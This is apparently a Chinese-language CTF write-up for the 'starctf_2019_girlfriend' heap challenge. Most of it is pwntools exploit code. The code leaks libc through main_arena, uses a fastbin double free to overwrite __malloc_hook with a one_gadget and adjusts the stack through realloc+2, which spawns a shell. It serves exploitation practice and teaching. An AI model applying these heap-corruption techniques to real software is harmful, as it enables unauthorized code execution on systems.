starctf_2019_girlfriend

保护全开,本想以简单的uaf去解决，但是却会内存错误，所以这个方法不行

from pwn import*
from LibcSearcher import *
#p=remote("node4.buuoj.cn",)
p=process("./starctf_2019_girlfriend")
context.log_level="debug"
libc=ELF('./libc-2.23.so')

def add(size,content1,content2):
	p.sendlineafter('Input your choice:','1')
	p.sendlineafter("girl's name",str(size))
	p.sendlineafter('please inpute her name:',content1)
	p.sendlineafter('please input her call:',content2)

def show(index):
	p.sendlineafter('Input your choice:','2')
	p.sendlineafter('Please input the index:',str(index))
	
def free(index):
	p.sendlineafter('Input your choice:','4')
	p.sendlineafter('Please input the index:',str(index))
	

add(0x20,'aaaa','bbbb')
add(0x80,'aaaa','bbbb')

free(0)
free(1)
show(0)
p.recvuntil('name:')
main_arena=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-88
base=main_arena-0x10-libc.sym['__malloc_hook']
system=base+libc.sym['system']
free_hook=base+libc.sym['__free_hook']
add(0x20,'dddd','eeee')
add(0x20,'/bin/sh','cccc')
print('main_arena'+hex(main_arena))
free(2) #2
free(3) #3
free(2)
gdb.attach(p)
sleep(1)

add(0x20,p64(free_hook-0x10),'dddd')
add(0x20,'cccc','dddd')
add(0x20,'eeee','vvvv')
add(0x20,p64(system),'dddd')

p.interactive()

首先malloc一个0x80大小的堆，再申请0x60大小的，后面改成比0x60小的堆时都会出现内存报错，free堆0的时候不会和topchunk合并，得到main_arena+88

add(0x80,'aaaa','bbbb')
add(0x60,'cccc','ssss')
add(0x60,'dddd','eeee')
free(0)
show(0)
p.recvuntil('name:')
main_arena=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print('main_arena'+hex(main_arena))
malloc_hook=main_arena-88-0x10
base=malloc_hook-libc.sym['__malloc_hook']

free(2)
free(1)
free(2)
one = [0x45226, 0x4527a, 0xf03a4, 0xf1147]
one_gadget=base+one[3]
realloc=libc.sym['realloc']+base
#这里的话得用到

realloc_hook=malloc_hook-0x8

add(0x60,p64(malloc_hook-0x23),p64(malloc_hook-0x23))
add(0x60,'cccc','dddd')
add(0x60,'dddd','eeee')
print('one_gadget='+hex(one_gadget)+'   malloc='+hex(malloc_hook-0x23)+'   realloc='+hex(realloc))

payload=b'a'*(0x13-8)+p64(one_gadget)+p64(realloc+2)
add(0x60,payload,'cccc')

使用one_gadget的条件

关于realloc函数调整函数栈帧的知识，关于为什么用realloc+2的地址

链接文本)

调试发现除了malloc_hook-0x23的地址可以改其它的地址都会报错，多1少1都不行

exp

from pwn import*
from LibcSearcher import *
#p=remote("node5.buuoj.cn",25861)
p=process("./starctf_2019_girlfriend")
context.log_level="debug"
libc=ELF('./libc-2.23.so')
def debug():
	gdb.attach(p)
	sleep(1)
def add(size,content1,content2):
	p.sendlineafter('Input your choice:','1')
	p.sendlineafter("girl's name",str(size))
	p.sendlineafter('please inpute her name:',content1)
	p.sendlineafter('please input her call:',content2)

def show(index):
	p.sendlineafter('Input your choice:','2')
	p.sendlineafter('Please input the index:',str(index))
	
def free(index):
	p.sendlineafter('Input your choice:','4')
	p.sendlineafter('Please input the index:',str(index))
	

#add(0x20,'aaaa','bbbb')
add(0x80,'aaaa','bbbb')
add(0x60,'cccc','ssss')
add(0x60,'dddd','eeee')
free(0)

show(0)


p.recvuntil('name:')
main_arena=u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print('main_arena'+hex(main_arena))
malloc_hook=main_arena-88-0x10
base=malloc_hook-libc.sym['__malloc_hook']


free(2)
free(1)
free(2)
one = [0x45226, 0x4527a, 0xf03a4, 0xf1147]
one_gadget=base+one[3]
realloc=libc.sym['realloc']+base

add(0x60,p64(malloc_hook-0x23),p64(malloc_hook-0x23))
add(0x60,'cccc','dddd')
add(0x60,'dddd','eeee')
print('one_gadget='+hex(one_gadget)+'   malloc-0x23='+hex(malloc_hook-0x23)+'   realloc='+hex(realloc))

payload=b'a'*(0x13-8)+p64(one_gadget)+p64(realloc+2)
add(0x60,payload,'cccc')
debug()
p.sendafter('Input your choice:','1')


p.interactive()